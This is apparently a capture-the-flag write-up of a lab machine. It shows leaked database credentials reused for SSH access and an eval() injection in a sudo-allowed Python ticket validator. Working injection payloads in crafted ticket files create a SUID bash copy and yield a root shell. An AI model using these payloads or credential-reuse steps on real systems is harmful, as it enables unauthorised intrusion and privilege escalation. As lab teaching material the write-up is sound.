CAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgICAgICA8IS0tIFBvcnRmb2xpbyBNb2RhbCA2LS0+CiAgICAgICAgPGRpdiBjbGFzcz0icG9ydGZvbGlvLW1vZGFsIG1vZGFsIGZhZGUiIGlkPSJwb3J0Zm9saW9Nb2RhbDYiIHRhYmluZGV4PSItMSIgcm9sZT0iZGlhbG9nIiBhcmlhLWxhYmVsbGVkYnk9InBvcnRmb2xpb01vZGFsNkxhYmVsIiBhcmlhLWhpZGRlbj0idHJ1ZSI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9Im1vZGFsLWRpYWxvZyBtb2RhbC14bCIgcm9sZT0iZG9jdW1lbnQiPgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0ibW9kYWwtY29udGVudCI+CiAgICAgICAgICAgICAgICAgICAgPGJ1dHRvbiBjbGFzcz0iY2xvc2UiIHR5cGU9ImJ1dHRvbiIgZGF0YS1kaXNtaXNzPSJtb2RhbCIgYXJpYS1sYWJlbD0iQ2xvc2UiPgogICAgICAgICAgICAgICAgICAgICAgICA8c3BhbiBhcmlhLWhpZGRlbj0idHJ1ZSI+PGkgY2xhc3M9ImZhcyBmYS10aW1lcyI+PC9pPjwvc3Bhbj4KICAgICAgICAgICAgICAgICAgICA8L2J1dHRvbj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJtb2RhbC1ib2R5IHRleHQtY2VudGVyIj4KICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InJvdyBqdXN0aWZ5LWNvbnRlbnQtY2VudGVyIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb2wtbGctOCI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwhLS0gUG9ydGZvbGlvIE1vZGFsIC0gVGl0bGUtLT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGgyIGNsYXNzPSJwb3J0Zm9saW8tbW9kYWwtdGl0bGUgdGV4dC1zZWNvbmRhcnkgdGV4dC11cHBlcmNhc2UgbWItMCIgaWQ9InBvcnRmb2xpb01vZGFsNkxhYmVsIj5TdWJtYXJpbmU8L2gyPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8IS0tIEljb24gRGl2aWRlci0tPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJkaXZpZGVyLWN1c3RvbSI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJkaXZpZGVyLWN1c3RvbS1saW5lIj48L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImRpdmlkZXItY3VzdG9tLWljb24iPjxpIGNsYXNzPSJmYXMgZmEtc3RhciI+PC9pPjwvZGl2PgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZGl2aWRlci1jdXN0b20tbGluZSI+PC9kaXY+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8IS0tIFBvcnRmb2xpbyBNb2RhbCAtIEltYWdlLS0+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxpbWcgY2xhc3M9ImltZy1mbHVpZCByb3VuZGVkIG1iLTUiIHNyYz0iYXNzZXRzL2ltZy9wb3J0Zm9saW8vc3VibWFyaW5lLnBuZyIgYWx0PSIiIC8+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwhLS0gUG9ydGZvbGlvIE1vZGFsIC0gVGV4dC0tPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8cCBjbGFzcz0ibWItNSI+TG9yZW0gaXBzdW0gZG9sb3Igc2l0IGFtZXQsIGNvbnNlY3RldHVyIGFkaXBpc2ljaW5nIGVsaXQuIE1vbGxpdGlhIG5lcXVlIGFzc3VtZW5kYSBpcHNhbSBuaWhpbCwgbW9sZXN0aWFzIG1hZ25hbSwgcmVjdXNhbmRhZSBxdW9zIHF1aXMgaW52ZW50b3JlIHF1aXNxdWFtIHZlbGl0IGFzcGVyaW9yZXMsIHZpdGFlPyBSZXByZWhlbmRlcml0IHNvbHV0YSwgZW9zIHF1b2QgY29uc2VxdXVudHVyIGl0YXF1ZS4gTmFtLjwvcD4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGJ1dHRvbiBjbGFzcz0iYnRuIGJ0bi1wcmltYXJ5IiBkYXRhLWRpc21pc3M9Im1vZGFsIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxpIGNsYXNzPSJmYXMgZmEtdGltZXMgZmEtZnciPjwvaT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENsb3NlIFdpbmRvdwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2J1dHRvbj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgICAgICA8IS0tIEJvb3RzdHJhcCBjb3JlIEpTLS0+CiAgICAgICAgPHNjcmlwdCBzcmM9Ii9yZXNvdXJjZXMvanF1ZXJ5Lm1pbi5qcyI+PC9zY3JpcHQ+CiAgICAgICAgPHNjcmlwdCBzcmM9Ii9yZXNvdXJjZXMvYm9vdHN0cmFwLmJ1bmRsZS5taW4uanMiPjwvc2NyaXB0PgogICAgICAgIDwhLS0gVGhpcmQgcGFydHkgcGx1Z2luIEpTLS0+CiAgICAgICAgPHNjcmlwdCBzcmM9Ii9yZXNvdXJjZXMvanF1ZXJ5LmVhc2luZy5taW4uanMiPjwvc2NyaXB0PgogICAgICAgIDwhLS0gQ29udGFjdCBmb3JtIEpTLS0+CiAgICAgICAgPHNjcmlwdCBzcmM9ImFzc2V0cy9tYWlsL2pxQm9vdHN0cmFwVmFsaWRhdGlvbi5qcyI+PC9zY3JpcHQ+CiAgICAgICAgPHNjcmlwdCBzcmM9ImFzc2V0cy9tYWlsL2NvbnRhY3RfbWUuanMiPjwvc2NyaXB0PgogICAgICAgIDwhLS0gQ29yZSB0aGVtZSBKUy0tPgogICAgICAgIDxzY3JpcHQgc3JjPSJqcy9zY3JpcHRzLmpzIj48L3NjcmlwdD4KICAgIDwvYm9keT4KPC9odG1sPgo=</td>
</tr>
<tr>
<td>CWE:</td>
<td>test</td>
</tr>
<tr>
<td>Score:</td>
<td>test</td>
</tr>
<tr>
<td>Reward:</td>
<td>test</td>
</tr>
</table>
Now let me decode that into a readable file.
Got it, but index.php isnt very interesting. Let's instead leak db.php and log_submit.php, as well as the tracker_diRbPr00f314.php file.
db.php looks good:
<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>
Let's see if we can ssh in with the creds development:m19RoAU0hP41A1sTsq6K
development@bountyhunter:~$
Ha! Im too damn good.
Internal Enum/Priv esc
development@bountyhunter:~$ cat contract.txt
Hey team,
I'll be out of the office this week but please make sure that our contract with Skytrain Inc gets completed.
This has been our first job since the "rm -rf" incident and we can't mess this up. Whenever one of you gets on please have a look at the internal tool they sent over. There have been a handful of tickets submitted that have been failing validation and I need you to figure out why.
I set up the permissions for you to test this. Good luck.
-- John
Okay, lets find this tool they mention.
using sudo -l:
User development may run the following commands on bountyhunter:
(root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
Here's the code for the file:
python
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.
def load_file(loc):
if loc.endswith(".md"):
return open(loc, 'r')
else:
print("Wrong file type.")
exit()
def evaluate(ticketFile):
#Evaluates a ticket to check for ireggularities.
code_line = None
for i,x in enumerate(ticketFile.readlines()):
if i == 0:
if not x.startswith("# Skytrain Inc"):
return False
continue
if i == 1:
if not x.startswith("## Ticket to "):
return False
print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
continue
if x.startswith("__Ticket Code:__"):
code_line = i+1
continue
if code_line and i == code_line:
if not x.startswith("**"):
return False
ticketCode = x.replace("**", "").split("+")[0]
if int(ticketCode) % 7 == 4:
validationNumber = eval(x.replace("**", ""))
if validationNumber > 100:
return True
else:
return False
return False
def main():
fileName = input("Please enter the path to the ticket file.\n")
ticket = load_file(fileName)
#DEBUG print(ticket)
result = evaluate(ticket)
if (result):
print("Valid ticket.")
else:
print("Invalid ticket.")
ticket.close
main()
We see from the source code that it wants .md files, and will open the file you input if it has this extension without much else in the way of testing (==can we symlink to a target file and just put .md on the link?==)
The evaluate() function checks that the first line of the file has the keyword # Skytrain Inc and that the second line has the keyword ## Ticket to.
It looks like this might be vulnerable to command injection:
python
validationNumber = eval(x.replace("**", ""))
It's sunday and I have to go in to work early to backfill, so Im going to have to put this on pause for now and pick it up again when I have time. What Ill do is copy and paste it into a local file and then step through the code, seeing where the flaws in logic are that would let me pass a payload to the eval function
Developing exploit for ticket verification program
What Im going to do here is copy and paste the program into my local desktop, instrument it with some print statements along the way, and see if I can sneak malicious code into the eval statement here:
python
validationNumber = eval(x.replace("**", ""))
This really shouldnt take more than 45 minutes tops.
Step 1 is to figure out how to get arbitrary text into the eval. Once we can do that, we can devise the specific payload.
So note what the program is doing. It's performing some checks on the code line, which is the line the follows __Ticket Code:__. It basically looks for a "+"-separated list of values, eg 14+5+333 and then tests if the first element mod 7 is equal to 4.
If it IS, it feeds the entire +-delimited list into the eval function after removing the leading **.
So I think it should be as simple as entering something like this:
11+__import__('os').system('id')
Damn, that was easy...
Here's my malicious ticket:
# Skytrain Inc
## Ticket to test
__Ticket Code:__
**11+__import__('os').system('id')
and here's the output:
$ python3 vulnerable.py
Please enter the path to the ticket file.
./test.md
Destination: test
uid=1000(shane) gid=1000(shane) groups=1000(shane),150(wireshark),966(libvirt-qemu),967(libvirt),968(docker),1001(genymotion)
Invalid ticket.
Alright. Let's connect back to the server and use this to spawn a root revshell.
I write this code into a ticket, which will make an SUID copy of /bin/bash:
# Skytrain Inc
## Ticket to test
__Ticket Code:__
**11+__import__('os').system('cp /bin/bash /home/development/copy; chmod +s /home/development/copy')
(I do it this way after trying to do a reverse shell unsuccessfully; caused program to crash and ssh session to terminate)
development@bountyhunter:~$ sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
Please enter the path to the ticket file.
./test.md
Destination: test
Invalid ticket.
development@bountyhunter:~$ ls
contract.txt copy test.md user.txt
and there we have it, a root SUID copy of bash.
We can run it with -p to get root shell:
development@bountyhunter:~$ ./copy -p
copy-5.0# whoami
root